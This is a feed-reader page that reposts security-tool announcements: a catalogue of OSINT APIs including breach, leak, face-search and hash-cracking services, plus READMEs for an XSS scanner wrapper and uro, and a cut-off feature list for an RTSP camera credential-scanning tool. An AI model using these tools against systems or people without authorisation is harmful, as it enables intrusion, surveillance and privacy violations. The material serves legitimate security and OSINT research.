FreshRSS

πŸ”’
❌ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
Before yesterdayTools

API-s-for-OSINT - List Of API's For Gathering Information About Phone Numbers, Addresses, Domains Etc

By: Unknown

APIs For OSINT

Β This is a Collection of APIs that will be useful for automating various tasks in OSINT.

Thank you for following me! https://cybdetective.com


    IOT/IP Search engines

    Name Link Description Price
    Shodan https://developer.shodan.io Search engine for Internet connected host and devices from $59/month
    Netlas.io https://netlas-api.readthedocs.io/en/latest/ Search engine for Internet connected host and devices. Read more at Netlas CookBook Partly FREE
    Fofa.so https://fofa.so/static_pages/api_help Search engine for Internet connected host and devices ???
    Censys.io https://censys.io/api Search engine for Internet connected host and devices Partly FREE
    Hunter.how https://hunter.how/search-api Search engine for Internet connected host and devices Partly FREE
    Fullhunt.io https://api-docs.fullhunt.io/#introduction Search engine for Internet connected host and devices Partly FREE
    IPQuery.io https://ipquery.io API for ip information such as ip risk, geolocation data, and asn details FREE

    Universal OSINT APIs

    Name Link Description Price
    Social Links https://sociallinks.io/products/sl-api Email info lookup, phone info lookup, individual and company profiling, social media tracking, dark web monitoring and more. Code example of using this API for face search in this repo PAID. Price per request

    Phone Number Lookup and Verification

    Name Link Description Price
    Numverify https://numverify.com Global Phone Number Validation & Lookup JSON API. Supports 232 countries. 250 requests FREE
    Twillo https://www.twilio.com/docs/lookup/api Provides a way to retrieve additional information about a phone number Free or $0.01 per request (for caller lookup)
    Plivo https://www.plivo.com/lookup/ Determine carrier, number type, format, and country for any phone number worldwide from $0.04 per request
    GetContact https://github.com/kovinevmv/getcontact Find info about user by phone number from $6,89 in months/100 requests
    Veriphone https://veriphone.io/ Phone number validation & carrier lookup 1000 requests/month FREE

    Address/ZIP codes lookup

    Name Link Description Price
    Global Address https://rapidapi.com/adminMelissa/api/global-address/ Easily verify, check or lookup address FREE
    US Street Address https://smartystreets.com/docs/cloud/us-street-api Validate and append data for any US postal address FREE
    Google Maps Geocoding API https://developers.google.com/maps/documentation/geocoding/overview convert addresses (like "1600 Amphitheatre Parkway, Mountain View, CA") into geographic coordinates 0.005 USD per request
    Postcoder https://postcoder.com/address-lookup Find adress by postcode Β£130/5000 requests
    Zipcodebase https://zipcodebase.com Lookup postal codes, calculate distances and much more 5000 requests FREE
    Openweathermap geocoding API https://openweathermap.org/api/geocoding-api get geographical coordinates (lat, lon) by using name of the location (city name or area name) 60 calls/minute 1,000,000 calls/month
    DistanceMatrix https://distancematrix.ai/product Calculate, evaluate and plan your routes $1.25-$2 per 1000 elements
    Geotagging API https://geotagging.ai/ Predict geolocations by texts Freemium

    People and documents verification

    Name Link Description Price
    Approuve.com https://appruve.co Allows you to verify the identities of individuals, businesses, and connect to financial account data across Africa Paid
    Onfido.com https://onfido.com Onfido Document Verification lets your users scan a photo ID from any device, before checking it's genuine. Combined with Biometric Verification, it's a seamless way to anchor an account to the real identity of a customer. India Paid
    Superpass.io https://surepass.io/passport-id-verification-api/ Passport, Photo ID and Driver License Verification in India Paid

    Business/Entity search

    Name Link Description Price
    Open corporates https://api.opencorporates.com Companies information Paid, price upon request
    Linkedin company search API https://docs.microsoft.com/en-us/linkedin/marketing/integrations/community-management/organizations/company-search?context=linkedin%2Fcompliance%2Fcontext&tabs=http Find companies using keywords, industry, location, and other criteria FREE
    Mattermark https://rapidapi.com/raygorodskij/api/Mattermark/ Get companies and investor information free 14-day trial, from $49 per month

    Domain/DNS/IP lookup

    Name Link Description Price
    API OSINT DS https://github.com/davidonzo/apiosintDS Collect info about IPv4/FQDN/URLs and file hashes in md5, sha1 or sha256 FREE
    InfoDB API https://www.ipinfodb.com/api The API returns the location of an IP address (country, region, city, zipcode, latitude, longitude) and the associated timezone in XML, JSON or plain text format FREE
    Domainsdb.info https://domainsdb.info Registered Domain Names Search FREE
    BGPView https://bgpview.docs.apiary.io/# allowing consumers to view all sort of analytics data about the current state and structure of the internet FREE
    DNSCheck https://www.dnscheck.co/api monitor the status of both individual DNS records and groups of related DNS records up to 10 DNS records/FREE
    Cloudflare Trace https://github.com/fawazahmed0/cloudflare-trace-api Get IP Address, Timestamp, User Agent, Country Code, IATA, HTTP Version, TLS/SSL Version & More FREE
    Host.io https://host.io/ Get info about domain FREE

    Mobile Apps Endpoints

    Name Link Description Price
    BeVigil OSINT API https://bevigil.com/osint-api provides access to millions of asset footprint data points including domain intel, cloud services, API information, and third party assets extracted from millions of mobile apps being continuously uploaded and scanned by users on bevigil.com 50 credits free/1000 credits/$50

    Scraping

    Name Link Description Price
    WebScraping.AI https://webscraping.ai/ Web Scraping API with built-in proxies and JS rendering FREE
    ZenRows https://www.zenrows.com/ Web Scraping API that bypasses anti-bot solutions while offering JS rendering, and rotating proxies apiKey Yes Unknown FREE

    Whois

    Name Link Description Price
    Whois freaks https://whoisfreaks.com/ well-parsed and structured domain WHOIS data for all domain names, registrars, countries and TLDs since the birth of internet $19/5000 requests
    WhoisXMLApi https://whois.whoisxmlapi.com gathers a variety of domain ownership and registration data points from a comprehensive WHOIS database 500 requests in month/FREE
    IPtoWhois https://www.ip2whois.com/developers-api Get detailed info about a domain 500 requests/month FREE

    GEO IP

    Name Link Description Price
    Ipstack https://ipstack.com Detect country, region, city and zip code FREE
    Ipgeolocation.io https://ipgeolocation.io provides country, city, state, province, local currency, latitude and longitude, company detail, ISP lookup, language, zip code, country calling code, time zone, current time, sunset and sunrise time, moonset and moonrise 30 000 requests per month/FREE
    IPInfoDB https://ipinfodb.com/api Free Geolocation tools and APIs for country, region, city and time zone lookup by IP address FREE
    IP API https://ip-api.com/ Free domain/IP geolocation info FREE

    Wi-fi lookup

    Name Link Description Price
    Mylnikov API https://www.mylnikov.org public API implementation of Wi-Fi Geo-Location database FREE
    Wigle https://api.wigle.net/ get location and other information by SSID FREE

    Network

    Name Link Description Price
    PeetingDB https://www.peeringdb.com/apidocs/ Database of networks, and the go-to location for interconnection data FREE
    PacketTotal https://packettotal.com/api.html .pcap files analyze FREE

    Finance

    Name Link Description Price
    Binlist.net https://binlist.net/ get information about bank by BIN FREE
    FDIC Bank Data API https://banks.data.fdic.gov/docs/ institutions, locations and history events FREE
    Amdoren https://www.amdoren.com/currency-api/ Free currency API with over 150 currencies FREE
    VATComply.com https://www.vatcomply.com/documentation Exchange rates, geolocation and VAT number validation FREE
    Alpaca https://alpaca.markets/docs/api-documentation/api-v2/market-data/alpaca-data-api-v2/ Realtime and historical market data on all US equities and ETFs FREE
    Swiftcodesapi https://swiftcodesapi.com Verifying the validity of a bank SWIFT code or IBAN account number $39 per month/4000 swift lookups
    IBANAPI https://ibanapi.com Validate IBAN number and get bank account information from it Freemium/10$ Starter plan

    Email

    Name Link Description Price
    EVA https://eva.pingutil.com/ Measuring email deliverability & quality FREE
    Mailboxlayer https://mailboxlayer.com/ Simple REST API measuring email deliverability & quality 100 requests FREE, 5000 requests in month β€” $14.49
    EmailCrawlr https://emailcrawlr.com/ Get key information about company websites. Find all email addresses associated with a domain. Get social accounts associated with an email. Verify email address deliverability. 200 requests FREE, 5000 requets β€” $40
    Voila Norbert https://www.voilanorbert.com/api/ Find anyone's email address and ensure your emails reach real people from $49 in month
    Kickbox https://open.kickbox.com/ Email verification API FREE
    FachaAPI https://api.facha.dev/ Allows checking if an email domain is a temporary email domain FREE

    Names/Surnames

    Name Link Description Price
    Genderize.io https://genderize.io Instantly answers the question of how likely a certain name is to be male or female and shows the popularity of the name. 1000 names/day free
    Agify.io https://agify.io Predicts the age of a person given their name 1000 names/day free
    Nataonalize.io https://nationalize.io Predicts the nationality of a person given their name 1000 names/day free

    Pastebin/Leaks

    Name Link Description Price
    HaveIBeenPwned https://haveibeenpwned.com/API/v3 allows the list of pwned accounts (email addresses and usernames) $3.50 per month
    Psdmp.ws https://psbdmp.ws/api search in Pastebin $9.95 per 10000 requests
    LeakPeek https://psbdmp.ws/api searc in leaks databases $9.99 per 4 weeks unlimited access
    BreachDirectory.com https://breachdirectory.com/api_documentation search domain in data breaches databases FREE
    LeekLookup https://leak-lookup.com/api search domain, email_address, fullname, ip address, phone, password, username in leaks databases 10 requests FREE
    BreachDirectory.org https://rapidapi.com/rohan-patra/api/breachdirectory/pricing search domain, email_address, fullname, ip address, phone, password, username in leaks databases (possible to view password hashes) 50 requests in month/FREE

    Archives

    Name Link Description Price
    Wayback Machine API (Memento API, CDX Server API, Wayback Availability JSON API) https://archive.org/help/wayback_api.php Retrieve information about Wayback capture data FREE
    TROVE (Australian Web Archive) API https://trove.nla.gov.au/about/create-something/using-api Retrieve information about TROVE capture data FREE
    Archive-it API https://support.archive-it.org/hc/en-us/articles/115001790023-Access-Archive-It-s-Wayback-index-with-the-CDX-C-API Retrieve information about archive-it capture data FREE
    UK Web Archive API https://ukwa-manage.readthedocs.io/en/latest/#api-reference Retrieve information about UK Web Archive capture data FREE
    Arquivo.pt API https://github.com/arquivo/pwa-technologies/wiki/Arquivo.pt-API Allows full-text search and access preserved web content and related metadata. It is also possible to search by URL, accessing all versions of preserved web content. API returns a JSON object. FREE
    Library Of Congress archive API https://www.loc.gov/apis/ Provides structured data about Library of Congress collections FREE
    BotsArchive https://botsarchive.com/docs.html JSON formatted details about Telegram Bots available in database FREE

    Hashes decrypt/encrypt

    Name Link Description Price
    MD5 Decrypt https://md5decrypt.net/en/Api/ Search for decrypted hashes in the database 1.99 EURO/day

    Crypto

    Name Link Description Price
    BTC.com https://btc.com/btc/adapter?type=api-doc get information about addresses and transanctions FREE
    Blockchair https://blockchair.com Explore data stored on 17 blockchains (BTC, ETH, Cardano, Ripple etc) $0.33 - $1 per 1000 calls
    Bitcointabyse https://www.bitcoinabuse.com/api-docs Lookup bitcoin addresses that have been linked to criminal activity FREE
    Bitcoinwhoswho https://www.bitcoinwhoswho.com/api Scam reports on the Bitcoin Address FREE
    Etherscan https://etherscan.io/apis Ethereum explorer API FREE
    apilayer coinlayer https://coinlayer.com Real-time Crypto Currency Exchange Rates FREE
    BlockFacts https://blockfacts.io/ Real-time crypto data from multiple exchanges via a single unified API, and much more FREE
    Brave NewCoin https://bravenewcoin.com/developers Real-time and historic crypto data from more than 200+ exchanges FREE
    WorldCoinIndex https://www.worldcoinindex.com/apiservice Cryptocurrencies Prices FREE
    WalletLabels https://www.walletlabels.xyz/docs Labels for 7,5 million Ethereum wallets FREE

    Malware

    Name Link Description Price
    VirusTotal https://developers.virustotal.com/reference files and urls analyze Public API is FREE
    AbuseLPDB https://docs.abuseipdb.com/#introduction IP/domain/URL reputation FREE
    AlienVault Open Threat Exchange (OTX) https://otx.alienvault.com/api IP/domain/URL reputation FREE
    Phisherman https://phisherman.gg IP/domain/URL reputation FREE
    URLScan.io https://urlscan.io/about-api/ Scan and Analyse URLs FREE
    Web of Thrust https://support.mywot.com/hc/en-us/sections/360004477734-API- IP/domain/URL reputation FREE
    Threat Jammer https://threatjammer.com/docs/introduction-threat-jammer-user-api IP/domain/URL reputation ???

    Face Search

    Name Link Description Price
    Search4faces https://search4faces.com/api.html Detect and locate human faces within an image, and returns high-precision face bounding boxes. Face⁺⁺ also allows you to store metadata of each detected face for future use. $21 per 1000 requests

    ## Face Detection

    Name Link Description Price
    Face++ https://www.faceplusplus.com/face-detection/ Search for people in social networks by facial image from 0.03 per call
    BetaFace https://www.betafaceapi.com/wpa/ Can scan uploaded image files or image URLs, find faces and analyze them. API also provides verification (faces comparison) and identification (faces search) services, as well able to maintain multiple user-defined recognition databases (namespaces) 50 image per day FREE/from 0.15 EUR per request

    ## Reverse Image Search

    Name Link Description Price
    Google Reverse images search API https://github.com/SOME-1HING/google-reverse-image-api/ This is a simple API built using Node.js and Express.js that allows you to perform Google Reverse Image Search by providing an image URL. FREE (UNOFFICIAL)
    TinEyeAPI https://services.tineye.com/TinEyeAPI Verify images, Moderate user-generated content, Track images and brands, Check copyright compliance, Deploy fraud detection solutions, Identify stock photos, Confirm the uniqueness of an image Start from $200/5000 searches
    Bing Images Search API https://www.microsoft.com/en-us/bing/apis/bing-image-search-api With Bing Image Search API v7, help users scour the web for images. Results include thumbnails, full image URLs, publishing website info, image metadata, and more. 1,000 requests free per month FREE
    MRISA https://github.com/vivithemage/mrisa MRISA (Meta Reverse Image Search API) is a RESTful API which takes an image URL, does a reverse Google image search, and returns a JSON array with the search results FREE? (no official)
    PicImageSearch https://github.com/kitUIN/PicImageSearch Aggregator for different Reverse Image Search API FREE? (no official)

    ## AI Geolocation

    Name Link Description Price
    Geospy https://api.geospy.ai/ Detecting estimation location of uploaded photo Access by request
    Picarta https://picarta.ai/api Detecting estimation location of uploaded photo 100 request/day FREE

    Social Media and Messengers

    Name Link Description Price
    Twitch https://dev.twitch.tv/docs/v5/reference
    YouTube Data API https://developers.google.com/youtube/v3
    Reddit https://www.reddit.com/dev/api/
    Vkontakte https://vk.com/dev/methods
    Twitter API https://developer.twitter.com/en
    Linkedin API https://docs.microsoft.com/en-us/linkedin/
    All Facebook and Instagram API https://developers.facebook.com/docs/
    Whatsapp Business API https://www.whatsapp.com/business/api
    Telegram and Telegram Bot API https://core.telegram.org
    Weibo API https://open.weibo.com/wiki/APIζ–‡ζ‘£/en
    XING https://dev.xing.com/partners/job_integration/api_docs
    Viber https://developers.viber.com/docs/api/rest-bot-api/
    Discord https://discord.com/developers/docs
    Odnoklassniki https://ok.ru/apiok
    Blogger https://developers.google.com/blogger/ The Blogger APIs allows client applications to view and update Blogger content FREE
    Disqus https://disqus.com/api/docs/auth/ Communicate with Disqus data FREE
    Foursquare https://developer.foursquare.com/ Interact with Foursquare users and places (geolocation-based checkins, photos, tips, events, etc) FREE
    HackerNews https://github.com/HackerNews/API Social news for CS and entrepreneurship FREE
    Kakao https://developers.kakao.com/ Kakao Login, Share on KakaoTalk, Social Plugins and more FREE
    Line https://developers.line.biz/ Line Login, Share on Line, Social Plugins and more FREE
    TikTok https://developers.tiktok.com/doc/login-kit-web Fetches user info and user's video posts on TikTok platform FREE
    Tumblr https://www.tumblr.com/docs/en/api/v2 Read and write Tumblr Data FREE

    UNOFFICIAL APIs

    !WARNING Use with caution! Accounts may be blocked permanently for using unofficial APIs.

    Name Link Description Price
    TikTok https://github.com/davidteather/TikTok-Api The Unofficial TikTok API Wrapper In Python FREE
    Google Trends https://github.com/suryasev/unofficial-google-trends-api Unofficial Google Trends API FREE
    YouTube Music https://github.com/sigma67/ytmusicapi Unofficial APi for YouTube Music FREE
    Duolingo https://github.com/KartikTalwar/Duolingo Duolingo unofficial API (can gather info about users) FREE
    Steam. https://github.com/smiley/steamapi An unofficial object-oriented Python library for accessing the Steam Web API. FREE
    Instagram https://github.com/ping/instagram_private_api Instagram Private API FREE
    Discord https://github.com/discordjs/discord.js JavaScript library for interacting with the Discord API FREE
    Zhihu https://github.com/syaning/zhihu-api FREE Unofficial API for Zhihu FREE
    Quora https://github.com/csu/quora-api Unofficial API for Quora FREE
    DnsDumbster https://github.com/PaulSec/API-dnsdumpster.com (Unofficial) Python API for DnsDumbster FREE
    PornHub https://github.com/sskender/pornhub-api Unofficial API for PornHub in Python FREE
    Skype https://github.com/ShyykoSerhiy/skyweb Unofficial Skype API for nodejs via 'Skype (HTTP)' protocol. FREE
    Google Search https://github.com/aviaryan/python-gsearch Google Search unofficial API for Python with no external dependencies FREE
    Airbnb https://github.com/nderkach/airbnb-python Python wrapper around the Airbnb API (unofficial) FREE
    Medium https://github.com/enginebai/PyMedium Unofficial Medium Python Flask API and SDK FREE
    Facebook https://github.com/davidyen1124/Facebot Powerful unofficial Facebook API FREE
    Linkedin https://github.com/tomquirk/linkedin-api Unofficial Linkedin API for Python FREE
    Y2mate https://github.com/Simatwa/y2mate-api Unofficial Y2mate API for Python FREE
    Livescore https://github.com/Simatwa/livescore-api Unofficial Livescore API for Python FREE

    Search Engines

    Name Link Description Price
    Google Custom Search JSON API https://developers.google.com/custom-search/v1/overview Search in Google 100 requests FREE
    Serpstack https://serpstack.com/ Google search results to JSON FREE
    Serpapi https://serpapi.com Google, Baidu, Yandex, Yahoo, DuckDuckGo, Bint and many others search results $50/5000 searches/month
    Bing Web Search API https://www.microsoft.com/en-us/bing/apis/bing-web-search-api Search in Bing (+instant answers and location) 1000 transactions per month FREE
    WolframAlpha API https://products.wolframalpha.com/api/pricing/ Short answers, conversations, calculators and many more from $25 per 1000 queries
    DuckDuckgo Instant Answers API https://duckduckgo.com/api An API for some of our Instant Answers, not for full search results. FREE

    | Memex Marginalia | https://memex.marginalia.nu/projects/edge/api.gmi | An API for new privacy search engine | FREE |

    News analyze

    Name Link Description Price
    MediaStack https://mediastack.com/ News articles search results in JSON 500 requests/month FREE

    Darknet

    Name Link Description Price
    Darksearch.io https://darksearch.io/apidoc search by websites in .onion zone FREE
    Onion Lookup https://onion.ail-project.org/ onion-lookup is a service for checking the existence of Tor hidden services and retrieving their associated metadata. onion-lookup relies on an private AIL instance to obtain the metadata FREE

    Torrents/file sharing

    Name Link Description Price
    Jackett https://github.com/Jackett/Jackett API for automate searching in different torrent trackers FREE
    Torrents API PY https://github.com/Jackett/Jackett Unofficial API for 1337x, Piratebay, Nyaasi, Torlock, Torrent Galaxy, Zooqle, Kickass, Bitsearch, MagnetDL,Libgen, YTS, Limetorrent, TorrentFunk, Glodls, Torre FREE
    Torrent Search API https://github.com/Jackett/Jackett API for Torrent Search Engine with Extratorrents, Piratebay, and ISOhunt 500 queries/day FREE
    Torrent search api https://github.com/JimmyLaurent/torrent-search-api Yet another node torrent scraper (supports iptorrents, torrentleech, torrent9, torrentz2, 1337x, thepiratebay, Yggtorrent, TorrentProject, Eztv, Yts, LimeTorrents) FREE
    Torrentinim https://github.com/sergiotapia/torrentinim Very low memory-footprint, self hosted API-only torrent search engine. Sonarr + Radarr Compatible, native support for Linux, Mac and Windows. FREE

    Vulnerabilities

    Name Link Description Price
    National Vulnerability Database CVE Search API https://nvd.nist.gov/developers/vulnerabilities Get basic information about CVE and CVE history FREE
    OpenCVE API https://docs.opencve.io/api/cve/ Get basic information about CVE FREE
    CVEDetails API https://www.cvedetails.com/documentation/apis Get basic information about CVE partly FREE (?)
    CVESearch API https://docs.cvesearch.com/ Get basic information about CVE by request
    KEVin API https://kevin.gtfkd.com/ API for accessing CISA's Known Exploited Vulnerabilities Catalog (KEV) and CVE Data FREE
    Vulners.com API https://vulners.com Get basic information about CVE FREE for personal use

    Flights

    Name Link Description Price
    Aviation Stack https://aviationstack.com get information about flights, aircrafts and airlines FREE
    OpenSky Network https://opensky-network.org/apidoc/index.html Free real-time ADS-B aviation data FREE
    AviationAPI https://docs.aviationapi.com/ FAA Aeronautical Charts and Publications, Airport Information, and Airport Weather FREE
    FachaAPI https://api.facha.dev Aircraft details and live positioning API FREE

    Webcams

    Name Link Description Price
    Windy Webcams API https://api.windy.com/webcams/docs Get a list of available webcams for a country, city or geographical coordinates FREE with limits or 9990 euro without limits

    ## Regex

    Name Link Description Price
    Autoregex https://autoregex.notion.site/AutoRegex-API-Documentation-97256bad2c114a6db0c5822860214d3a Convert English phrase to regular expression from $3.49/month

    API testing tools

    Name Link
    API Guessr (detect API by auth key or by token) https://api-guesser.netlify.app/
    REQBIN Online REST & SOAP API Testing Tool https://reqbin.com
    ExtendClass Online REST Client https://extendsclass.com/rest-client-online.html
    Codebeatify.org Online API Test https://codebeautify.org/api-test
    SyncWith Google Sheet add-on. Link more than 1000 APIs with Spreadsheet https://workspace.google.com/u/0/marketplace/app/syncwith_crypto_binance_coingecko_airbox/449644239211?hl=ru&pann=sheets_addon_widget
    Talend API Tester Google Chrome Extension https://workspace.google.com/u/0/marketplace/app/syncwith_crypto_binance_coingecko_airbox/449644239211?hl=ru&pann=sheets_addon_widget
    Michael Bazzel APIs search tools https://inteltechniques.com/tools/API.html

    Curl converters (tools that help to write code using API queries)

    Name Link
    Convert curl commands to Python, JavaScript, PHP, R, Go, C#, Ruby, Rust, Elixir, Java, MATLAB, Dart, CFML, Ansible URI or JSON https://curlconverter.com
    Curl-to-PHP. Instantly convert curl commands to PHP code https://incarnate.github.io/curl-to-php/
    Curl to PHP online (Codebeatify) https://codebeautify.org/curl-to-php-online
    Curl to JavaScript fetch https://kigiri.github.io/fetch/
    Curl to JavaScript fetch (Scrapingbee) https://www.scrapingbee.com/curl-converter/javascript-fetch/
    Curl to C# converter https://curl.olsh.me

    Create your own API

    Name Link
    Sheety. Create API frome GOOGLE SHEET https://sheety.co/
    Postman. Platform for creating your own API https://www.postman.com
    Reetoo. Rest API Generator https://retool.com/api-generator/
    Beeceptor. Rest API mocking and intercepting in seconds (no coding). https://beeceptor.com

    Distribute your own API

    Name Link
    RapidAPI. Market your API for millions of developers https://rapidapi.com/solution/api-provider/
    Apilayer. API Marketplace https://apilayer.com

    API Keys Info

    Name Link Description
    Keyhacks https://github.com/streaak/keyhacks Keyhacks is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid.
    All about APIKey https://github.com/daffainfo/all-about-apikey Detailed information about API key / OAuth token for different services (Description, Request, Response, Regex, Example)
    API Guessr https://api-guesser.netlify.app/ Enter API Key and and find out which service they belong to

    API directories

    If you don't find what you need, try searching these directories.

    Name Link Description
    APIDOG ApiHub https://apidog.com/apihub/
    Rapid APIs collection https://rapidapi.com/collections
    API Ninjas https://api-ninjas.com/api
    APIs Guru https://apis.guru/
    APIs List https://apislist.com/
    API Context Directory https://apicontext.com/api-directory/
    Any API https://any-api.com/
    Public APIs Github repo https://github.com/public-apis/public-apis

    How to learn how to work with REST API?

    If you don't know how to work with the REST API, I recommend you check out the Netlas API guide I wrote for Netlas.io.

    Netlas Cookbook

    There it is very brief and accessible to write how to automate requests in different programming languages (focus on Python and Bash) and process the resulting JSON data.

    Thank you for following me! https://cybdetective.com



    Liam - Automatically Generates Beautiful And Easy-To-Read ER Diagrams From Your Database

    By: Unknown

    Automatically generates beautiful and easy-to-read ER diagrams from your database. (1)Β 

    Automatically generates beautiful and easy-to-read ER diagrams from your database.

    Automatically generates beautiful and easy-to-read ER diagrams from your database. (8)

    Website β€’ Documentation β€’ Roadmap

    What's Liam ERD?

    Liam ERD generates beautiful, interactive ER diagrams from your database. Whether you're working on public or private repositories, Liam ERD helps you visualize complex schemas with ease.

    • Beautiful UI & Interactive: A clean design and intuitive features (like panning, zooming, and filtering) make it easy to understand even the most complex databases.
    • Simple Reverse Engineering: Seamlessly turn your existing database schemas into clear, readable diagrams.
    • Effortless Setup: Get started with zero configurationβ€”just provide your schema, and you're good to go.
    • High Performance: Optimized for both small and large projects, easily handling 100+ tables.
    • Fully Open-Source: Contribute to the project and shape Liam ERD to fit your needs.

    Quick Start

    For Public Repositories

    Insert liambx.com/erd/p/ into your schema file's URL:

    # Original: https://github.com/user/repo/blob/master/db/schema.rb
    # Modified: https://liambx.com/erd/p/github.com/user/repo/blob/master/db/schema.rb
    πŸ‘Ύ^^^^^^^^^^^^^^^^πŸ‘Ύ

    For Private Repositories

    Run the interactive setup:

    npx @liam-hq/cli init

    If you find this project helpful, please give it a star! ⭐
    Your support helps us reach a wider audience and continue development.

    Documentation

    Check out the full documentation on the website.

    Roadmap

    See what we're working on and what's coming next on our roadmap.



    Uro - Declutters Url Lists For Crawling/Pentesting

    By: Unknown


    Using a URL list for security testing can be painful as there are a lot of URLs that have uninteresting/duplicate content; uro aims to solve that.

    It doesn't make any http requests to the URLs and removes: - incremental urls e.g. /page/1/ and /page/2/ - blog posts and similar human written content e.g. /posts/a-brief-history-of-time - urls with same path but parameter value difference e.g. /page.php?id=1 and /page.php?id=2 - images, js, css and other "useless" files


    Installation

    The recommended way to install uro is as follows:

    pipx install uro

    Note: If you are using an older version of python, use pip instead of pipx

    Basic Usage

    The quickest way to include uro in your workflow is to feed it data through stdin and print it to your terminal.

    cat urls.txt | uro

    Advanced usage

    Reading urls from a file (-i/--input)

    uro -i input.txt

    Writing urls to a file (-o/--output)

    If the file already exists, uro will not overwrite the contents. Otherwise, it will create a new file.

    uro -i input.txt -o output.txt

    Whitelist (-w/--whitelist)

    uro will ignore all other extensions except the ones provided.

    uro -w php asp html

    Note: Extensionless pages e.g. /books/1 will still be included. To remove them too, use --filter hasext.

    Blacklist (-b/--blacklist)

    uro will ignore the given extensions.

    uro -b jpg png js pdf

    Note: uro has a list of "useless" extensions which it removes by default; that list will be overridden by whatever extensions you provide through blacklist option. Extensionless pages e.g. /books/1 will still be included. To remove them too, use --filter hasext.

    Filters (-f/--filters)

    For granular control, uro supports the following filters:

    1. hasparams: only output urls that have query parameters e.g. http://example.com/page.php?id=
    2. noparams: only output urls that have no query parameters e.g. http://example.com/page.php
    3. hasext: only output urls that have extensions e.g. http://example.com/page.php
    4. noext: only output urls that have no extensions e.g. http://example.com/page
    5. allexts: don't remove any page based on extension e.g. keep .jpg which would be removed otherwise
    6. keepcontent: keep human written content e.g. blogs.
    7. keepslash: don't remove trailing slash from urls e.g. http://example.com/page/
    8. vuln: only output urls with parameters that are know to be vulnerable. More info.

    Example: uro --filters hasexts hasparams



    VulnKnox - A Go-based Wrapper For The KNOXSS API To Automate XSS Vulnerability Testing

    By: Unknown


    VulnKnox is a powerful command-line tool written in Go that interfaces with the KNOXSS API. It automates the process of testing URLs for Cross-Site Scripting (XSS) vulnerabilities using the advanced capabilities of the KNOXSS engine.


    Features

    • Supports pipe input for passing file lists and echoing URLs for testing
    • Configurable retries and timeouts
    • Supports GET, POST, and BOTH HTTP methods
    • Advanced Filter Bypass (AFB) feature
    • Flash Mode for quick XSS polyglot testing
    • CheckPoC feature to verify the proof of concept
    • Concurrent processing with configurable parallelism
    • Custom headers support for authenticated requests
    • Proxy support
    • Discord webhook integration for notifications
    • Detailed output with color-coded results

    Installation

    go install github.com/iqzer0/vulnknox@latest

    Configuration

    Before using the tool, you need to set up your configuration:

    API Key

    Obtain your KNOXSS API key from knoxss.me.

    On the first run, a default configuration file will be created at:

    Linux/macOS: ~/.config/vulnknox/config.json
    Windows: %APPDATA%\VulnKnox\config.json
    Edit the config.json file and replace YOUR_API_KEY_HERE with your actual API key.

    Discord Webhook (Optional)

    If you want to receive notifications on Discord, add your webhook URL to the config.json file or use the -dw flag.

    Usage

    Usage of vulnknox:

    -u Input URL to send to KNOXSS API
    -i Input file containing URLs to send to KNOXSS API
    -X GET HTTP method to use: GET, POST, or BOTH
    -pd POST data in format 'param1=value&param2=value'
    -headers Custom headers in format 'Header1:value1,Header2:value2'
    -afb Use Advanced Filter Bypass
    -checkpoc Enable CheckPoC feature
    -flash Enable Flash Mode
    -o The file to save the results to
    -ow Overwrite output file if it exists
    -oa Output all results to file, not just successful ones
    -s Only show successful XSS payloads in output
    -p 3 Number of parallel processes (1-5)
    -t 600 Timeout for API requests in seconds
    -dw Discord Webhook URL (overrides config file)
    -r 3 Number of retries for failed requests
    -ri 30 Interval between retries in seconds
    -sb 0 Skip domains after this many 403 responses
    -proxy Proxy URL (e.g., http://127.0.0.1:8080)
    -v Verbose output
    -version Show version number
    -no-banner Suppress the banner
    -api-key KNOXSS API Key (overrides config file)

    Basic Examples

    Test a single URL using GET method:

    vulnknox -u "https://example.com/page?param=value"

    Test a URL with POST data:

    vulnknox -u "https://example.com/submit" -X POST -pd "param1=value1&param2=value2"

    Enable Advanced Filter Bypass and Flash Mode:

    vulnknox -u "https://example.com/page?param=value" -afb -flash

    Use custom headers (e.g., for authentication):

    vulnknox -u "https://example.com/secure" -headers "Cookie:sessionid=abc123"

    Process URLs from a file with 5 concurrent processes:

    vulnknox -i urls.txt -p 5

    Send notifications to Discord on successful XSS findings:

    vulnknox -u "https://example.com/page?param=value" -dw "https://discord.com/api/webhooks/your/webhook/url"

    Advanced Usage

    Test both GET and POST methods with CheckPoC enabled:

    vulnknox -u "https://example.com/page" -X BOTH -checkpoc

    Use a proxy and increase the number of retries:

    vulnknox -u "https://example.com/page?param=value" -proxy "http://127.0.0.1:8080" -r 5

    Suppress the banner and only show successful XSS payloads:

    vulnknox -u "https://example.com/page?param=value" -no-banner -s

    Output Explanation

    [ XSS! ]: Indicates a successful XSS payload was found.
    [ SAFE ]: No XSS vulnerability was found in the target.
    [ ERR! ]: An error occurred during the request.
    [ SKIP ]: The domain or URL was skipped due to multiple failed attempts (e.g., after receiving too many 403 Forbidden responses as specified by the -sb option).
    [BALANCE]: Indicates your current API usage with KNOXSS, showing how many API calls you've used out of your total allowance.

    The tool also provides a summary at the end of execution, including the number of requests made, successful XSS findings, safe responses, errors, and any skipped domains.

    Contributing

    Contributions are welcome! If you have suggestions for improvements or encounter any issues, please open an issue or submit a pull request.

    License

    This project is licensed under the MIT License.

    Credits

    @KN0X55
    @BruteLogic
    @xnl_h4ck3r



    Camtruder - Advanced RTSP Camera Discovery and Vulnerability Assessment Tool

    By: Unknown


    Camtruder is a high-performance RTSP camera discovery and vulnerability assessment tool written in Go. It efficiently scans and identifies vulnerable RTSP cameras across networks using various authentication methods and path combinations, with support for both targeted and internet-wide scanning capabilities.


    🌟 Key Features

    • Advanced Scanning Capabilities
    • Single IP targeting
    • CIDR range scanning
    • File-based target lists
    • Pipe input support
    • Internet-wide scanning with customizable limits
    • Intelligent port discovery
    • Location-based search using RIPE database
    • Raw CIDR output for integration with other tools

    • Screenshot Capability

    • Capture screenshots of discovered cameras
    • Automatic saving of JPEG images
    • Requires ffmpeg installation
    • Configurable output directory

    • Location-Based Search

    • Search by city or country name
    • RIPE database integration
    • Detailed output with netnames and IP ranges
    • CIDR notation support
    • Raw output mode for scripting

    • Comprehensive Authentication Testing

    • Built-in common credential database
    • Custom username/password list support
    • File-based credential input
    • Multiple authentication format handling
    • Credential validation system

    • Smart Path Discovery

    • Extensive default path database
    • Vendor-specific path detection
    • Dynamic path generation
    • Automatic path validation

    • High Performance Architecture

    • Multi-threaded scanning engine
    • Configurable connection timeouts
    • Efficient resource management
